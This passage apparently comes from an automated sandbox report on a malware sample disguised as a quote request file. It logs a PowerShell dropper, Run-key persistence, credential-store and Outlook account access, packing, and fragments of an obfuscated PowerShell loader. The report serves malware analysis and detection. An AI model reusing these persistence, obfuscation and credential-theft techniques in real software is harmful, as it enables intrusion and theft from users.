            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Priority_Quote_Request_Items_List.exeStatic file information: File size 1244223 > 1048576
            Source: Priority_Quote_Request_Items_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeUnpacked PE file: 12.2.lftebevgelserne.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeUnpacked PE file: 13.2.lftebevgelserne.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bekostede $Programmeller $Clayish), (Sklmsstregers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:sygepassernes = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Syndfloderne)), $valdrappet).DefineDynamicModule($Julebukke, $false).DefineType($Animadversiveness, $Misyokes, [System.MulticastDelega
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F241219 push esp; iretd 5_2_1F24121A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232806 push ecx; ret 5_2_1F232819
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
